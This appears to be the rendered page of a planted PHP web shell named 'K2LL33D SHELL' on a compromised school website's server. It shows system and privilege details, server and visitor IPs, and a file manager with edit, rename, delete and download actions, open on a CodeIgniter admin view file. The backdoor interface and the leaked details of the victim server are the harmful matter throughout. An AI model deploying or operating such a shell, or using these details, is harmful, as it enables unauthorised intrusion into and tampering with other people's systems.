K2LL33D SHELL

 Apache/2.4.7 (Ubuntu)
 Linux sman1baleendah 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: OFF | WGet: ON
  >  / var / www / html / sman1baleendahoppppppp / views /
server ip : 172.67.156.115

your ip : 108.162.216.142

H O M E


Filename/var/www/html/sman1baleendahoppppppp/views/posts_read.php
Size1.66 kb
Permissionrw-r--r--
Ownerroot : root
Create time04-May-2025 17:23
Last modified04-May-2025 17:23
Last accessed06-Jul-2025 22:34
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<?php defined('BASEPATH') OR exit('No direct script access allowed');
$this->load->view('backend/grid_index');?>
<script type="text/javascript">
var _grid = 'POSTS';
new GridBuilder( _grid , {
controller:'posts',
fields: [
{
header: '<i class="fa fa-edit"></i>',
renderer: function( row ) {
if (row.post_status == 'draft') {
return Ahref(_BASE_URL + 'posts/create/' + row.id, 'Edit');
}
return '';
},
exclude_excel: true,
sorting: false
},
{
header: '<i class="fa fa-search"></i>',
renderer: function( row ) {
return A('find_id(' + row.id +')', 'Lihat Pesan', '<i class="fa fa-search"></i>');
},
exclude_excel: true,
sorting: false
},
{ header:'Judul', renderer:'post_title' },
{ header:'Penulis', renderer:'post_author' },
{
header:'Status',
renderer: function( row ) {
return row.post_status.charAt(0).toUpperCase() + row.post_status.slice(1);
},
sort_field: 'post_status'
},
{ header:'Tanggal', renderer:'created_at', type:'date' }
],
can_add: false,
can_delete: false,
can_restore: false,
resize_column: 3,
extra_buttons: '<a class="btn btn-default btn-sm add" href="' + _BASE_URL + 'posts/create'+'" data-toggle="tooltip" data-placement="top" title="Add"><i class="fa fa-plus"></i></a>'
});

function find_id( id ) {
$.post(_BASE_URL + 'posts/find_id', {id:id}, function(response) {
$('.modal-form').modal({
show:true
});
var post_content = response.post_content;
$('.modal-body').empty().html('<p>' + post_content + '</p>');
$('.modal-title').empty().html('<i class="fa fa-search" aria-hidden="true"></i> Tulisan');
});
}
</script>